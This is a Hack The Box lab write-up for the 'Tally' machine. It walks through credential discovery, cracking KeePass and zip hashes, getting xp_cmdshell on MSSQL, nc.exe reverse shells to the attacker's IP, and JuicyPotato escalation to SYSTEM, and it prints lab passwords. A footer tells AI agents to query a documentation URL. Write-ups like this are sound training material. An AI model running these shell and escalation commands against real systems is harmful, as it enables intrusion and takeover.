# HTB - Tally ![Tally](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4RyE4ePbWwlhDCP6ts%2F-M4S71uRIhcTMLSXHKYC%2Fimage.png?alt=media\&token=c9361164-580c-4c32-8212-62bc34461373) ## Getting Root 1. We find some files on share-point which have credentials to the FTP server 2. From FTP we get a **KeePass** database file with credentials that allow us to get a zip file from smb and that file has credentials to the **SQL** server which allows us to get a shell using **xp\_cmdshell** 3. The user sarah has the **`SeImpersonatePrivilege`** which is easily exploitable using the **`rotten potato/juicypotato`** ### Tools Used: **`nmap, dirsearch.py, keepass2john, zip2john, impacket-mssqlclient.py, impacket-smbserver, juicypotato`** ## Nmap ```bash Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 20:22 EDT Nmap scan report for tally.htb (10.10.10.59) Host is up (0.12s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 10.0 | http-ntlm-info: | Target_Name: TALLY | NetBIOS_Domain_Name: TALLY | NetBIOS_Computer_Name: TALLY | DNS_Domain_Name: TALLY | DNS_Computer_Name: TALLY |_ Product_Version: 10.0.14393 |_http-server-header: Microsoft-IIS/10.0 | http-title: Home |_Requested resource was http://tally.htb/_layouts/15/start.aspx#/default.aspx 81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Bad Request 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 808/tcp open ccproxy-http? 1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM | ms-sql-ntlm-info: | Target_Name: TALLY | NetBIOS_Domain_Name: TALLY | NetBIOS_Computer_Name: TALLY | DNS_Domain_Name: TALLY | DNS_Computer_Name: TALLY |_ Product_Version: 10.0.14393 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2020-04-05T22:22:49 |_Not valid after: 2050-04-05T22:22:49 |_ssl-date: 2020-04-06T00:25:52+00:00; +56s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 15567/tcp open http Microsoft IIS httpd 10.0 | http-auth: | HTTP/1.1 401 Unauthorized\x0D | Negotiate |_ NTLM | http-ntlm-info: | Target_Name: TALLY | NetBIOS_Domain_Name: TALLY | NetBIOS_Computer_Name: TALLY | DNS_Domain_Name: TALLY | DNS_Computer_Name: TALLY |_ Product_Version: 10.0.14393 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title. 32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Service Unavailable | ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US | Subject Alternative Name: DNS:localhost, DNS:tally | Not valid before: 2017-09-17T22:51:16 |_Not valid after: 9999-01-01T00:00:00 |_ssl-date: 2020-04-06T00:25:51+00:00; +55s from scanner time. | tls-alpn: | h2 |_ http/1.1 32846/tcp open storagecraft-image StorageCraft Image Manager 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open unknown 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 55s, deviation: 0s, median: 54s | ms-sql-info: | 10.10.10.59:1433: | Version: | name: Microsoft SQL Server 2016 RTM | number: 13.00.1601.00 | Product: Microsoft SQL Server 2016 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-04-06T00:25:00 |_ start_date: 2020-04-05T22:22:09 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 131.20 seconds ``` ## Enumeration ### HTTP - Port 80 #### Dirsearch.py ```bash #python3 /opt/dirsearch/dirsearch.py -u http://tally.htb -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -E _|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 1708 Error Log: /opt/dirsearch/logs/errors-20-04-05_23-09-45.log Target: http://tally.htb [23:16:08] 302 - 143B - /_layouts/viewedit.aspx -> /_layouts/15/viewedit.aspx [23:16:08] 302 - 143B - /_layouts/viewlsts.aspx -> /_layouts/15/viewlsts.aspx [23:16:08] 302 - 143B - /_layouts/versions.aspx -> /_layouts/15/versions.aspx ``` Visiting `/_layouts/viewlsts.aspx` provides some interesting results. ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CY9IewcJeqsV_qeVL%2F-M4CYwPIJsKqv4_XWTXC%2Fimage.png?alt=media\&token=c667656c-d05f-4f78-b593-9992d342d6ce) ### Found Documents with Cred The Documents folder had a file with FTP details ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CZTSxaRhtWrJST0q3%2F-M4C_UMb7m7PYbYb1cAR%2Fimage.png?alt=media\&token=5bce0353-e77e-4fec-8ece-28fc7b25143d) FTP details: ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CZTSxaRhtWrJST0q3%2F-M4C_fct_ueRykJw8v2q%2Fimage.png?alt=media\&token=19e01f8b-91af-432b-9efb-a307b7d2ffd2) Password: **`UTDRSCH53c"$6hys`** Checking under **Site Pages**, we noticed another file named **Finance Team** ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CcCCFcmb1OpKTUmsL%2F-M4Cpu96S8kb_zoN03DL%2Fimage.png?alt=media\&token=d4296bf5-5e30-457a-b233-d2f8489fdd56) Looking at the contents of the file, we notice the username **`ftp_user`** ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CcCCFcmb1OpKTUmsL%2F-M4Cq5pnQAJfV9Nt26kb%2Fimage.png?alt=media\&token=5182a734-3484-4a04-97b2-68985123cbc3) ### FTP - Port 21 We can successfully login using **`ftp_user`** and the password we found earlier. ```bash # ncftp -u ftp_user -p 'UTDRSCH53c"$6hys' 10.10.10.59 NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/). Connecting to 10.10.10.59... Microsoft FTP Service Logging in... User logged in. Logged in to 10.10.10.59. ncftp / > ls From-Custodian/ Intranet/ Logs/ To-Upload/ User/ ncftp / > ``` ### Found KeePass File Under **`/Users/Tim`** we find a keepass file named **`tim.kdbx`** ```bash ncftp /User/Tim > cd Files/ ncftp /User/Tim/Files > ls bonus.txt KeePass-2.36/ tim.kdbx ``` ### Cracking the KeePass password ```bash # keepass2john tim.kdbx > tim_hash # sudo john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt tim_hash Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/64]) Cost 1 (iteration count) is 6000 for all loaded hashes Cost 2 (version) is 2 for all loaded hashes Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status simplementeyo (tim) 1g 0:00:00:11 DONE (2020-04-06 01:09) 0.08718g/s 2153p/s 2153c/s 2153C/s simplementeyo..sept17 Use the "--show" option to display all of the cracked passwords reliably Session completed ``` ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CuAJZCSBLyDj1K9Hv%2F-M4CvlNzL-efbca2hbX6%2Fimage.png?alt=media\&token=cb6f120c-d6fc-42ae-a18b-e7a6efc40865) **`Username: Finance`**\ **`Password: Acc0unting`** ### SMB - Port 445 Checking the credentials using cme works and we also notice that we have read access to the **`ACCT`** share. ```bash # crackmapexec smb 10.10.10.59 -u finance -p Acc0unting --shares SMB 10.10.10.59 445 TALLY [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True) SMB 10.10.10.59 445 TALLY [+] TALLY\finance:Acc0unting SMB 10.10.10.59 445 TALLY [+] Enumerated shares SMB 10.10.10.59 445 TALLY Share Permissions Remark SMB 10.10.10.59 445 TALLY ----- ----------- ------ SMB 10.10.10.59 445 TALLY ACCT READ SMB 10.10.10.59 445 TALLY ADMIN$ Remote Admin SMB 10.10.10.59 445 TALLY C$ Default share SMB 10.10.10.59 445 TALLY IPC$ Remote IPC ``` ### Found a zipfile ```bash smb: \zz_Migration\Backup\20170808\orcharddb\> ls . D 0 Sun Sep 3 10:23:16 2017 .. D 0 Sun Sep 3 10:23:16 2017 orcharddb.zip A 1012 Sun Sep 3 10:23:07 2017 ``` ### Cracking the zipfile ```bash # zip2john orcharddb.zip > orchard_hash # john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt orchard_hash Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Acc0unting (orcharddb.zip/orcharddb.sql) 1g 0:00:00:00 DONE (2020-04-06 02:24) 1.010g/s 11551Kp/s 11551Kc/s 11551KC/s Aimeerose83..Abdouhabibi Use the "--show" option to display all of the cracked passwords reliably Session completed ``` Unzipping the file **orcharddb.zip** shows an sql file with some creds. ```bash ([Id], [UserName], [Email], [NormalizedUserName], [Password], [PasswordFormat], [HashAlgorithm], [PasswordSalt], [RegistrationStatus], [EmailStatus], [EmailChallengeToken]) (2, N'admin', N'', N'admin', N'Finance2', N'Clear', N'SHA1', N's2Ieb5Pn7Vwf+X6JEXJitg==', N'Approved', N'Approved', NULL) ``` ### Found **tester.exe** ```bash smb: \zz_Migration\Binaries\New Folder\> ls . D 0 Thu Sep 21 02:21:09 2017 .. D 0 Thu Sep 21 02:21:09 2017 crystal_reports_viewer_2016_sp04_51051980.zip A 389188014 Wed Sep 13 15:56:38 2017 Macabacus2016.exe A 18159024 Mon Sep 11 17:20:05 2017 Orchard.Web.1.7.3.zip A 21906356 Tue Aug 29 19:27:42 2017 putty.exe A 774200 Sun Sep 17 16:19:26 2017 RpprtSetup.exe A 483824 Fri Sep 15 15:49:46 2017 tableau-desktop-32bit-10-3-2.exe A 254599112 Mon Sep 11 17:13:14 2017 tester.exe A 215552 Fri Sep 1 07:15:54 2017 vcredist_x64.exe A 7194312 Wed Sep 13 16:06:28 2017 8387839 blocks of size 4096. 714594 blocks available smb: \zz_Migration\Binaries\New Folder\> get tester.exe getting file \zz_Migration\Binaries\New Folder\tester.exe of size 215552 as tester.exe (357.4 KiloBytes/sec) (average 357.4 KiloBytes/sec) smb: \zz_Migration\Binaries\New Folder\> # strings tester.exe DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G; ``` #### Creds: **`sa:GWE3V65#6KFH93@4GWTG2G`** ## Exploitation: ```bash python /opt/impacket/examples/mssqlclient.py sa:'GWE3V65#6KFH93@4GWTG2G'@10.10.10.59 Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(TALLY): Line 1: Changed database context to 'master'. [*] INFO(TALLY): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (130 665) [!] Press help for extra shell commands SQL> ``` ### Getting a shell ```bash SQL> help lcd {path} - changes the current local directory to {path} exit - terminates the server process (and this session) enable_xp_cmdshell - you know what it means disable_xp_cmdshell - you know what it means xp_cmdshell {cmd} - executes cmd using xp_cmdshell sp_start_job {cmd} - executes cmd using the sql server agent (blind) ! {cmd} - executes a local shell cmd SQL> enable_xp_cmdshell [*] INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. [*] INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL> enable_xp_cmdshell 1 [*] INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. [*] INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install. SQL> RECONFIGURE SQL> xp_cmdshell whoami output -------------------------------------------------------------------------------- tally\sarah ``` Copy **nc.exe** to the box using **impacket-smbserver** ```bash On my Kali Box # impacket-smbserver share $(pwd) On Tally # SQL> xp_cmdshell net use p: \\10.10.14.55\share # SQL> xp_cmdshell copy p:\nc.exe c:\temp # SQL> xp_cmdshell c:\temp\nc.exe -e cmd.exe 10.10.14.55 9001 On my kali box, I get a shell # rlwrap nc -lnvp 9001 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.59. Ncat: Connection from 10.10.10.59:49907. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32> ``` ## Privilege Escalation The user **sarah** has some privileges that can be abused using **JuicyPotato** ```bash c:\TEMP>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled ``` We copied the **JuicyPotato** to the target using the same method we used for **nc.exe** when executed, we didn't get a shell. However after trying different CLSID, we got a shell CLSID that worked:\ \&#xNAN;**`UsoSvc {E7299E79-75E5-47BB-A03D-6D319FB7F886} {B91D5831-B1BD-4608-8198-D72E155020F7}`** ```bash c:\TEMP>.\jp.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9005" -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}" .\jp.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9005" -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}" Testing {7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381} 1337 ...... [+] authresult 0 {7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK c:\TEMP> ``` ```bash Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::9005 Ncat: Listening on 0.0.0.0:9005 Ncat: Connection from 10.10.10.59. Ncat: Connection from 10.10.10.59:49979. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/htb-writeups/writeups/htb-tally.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.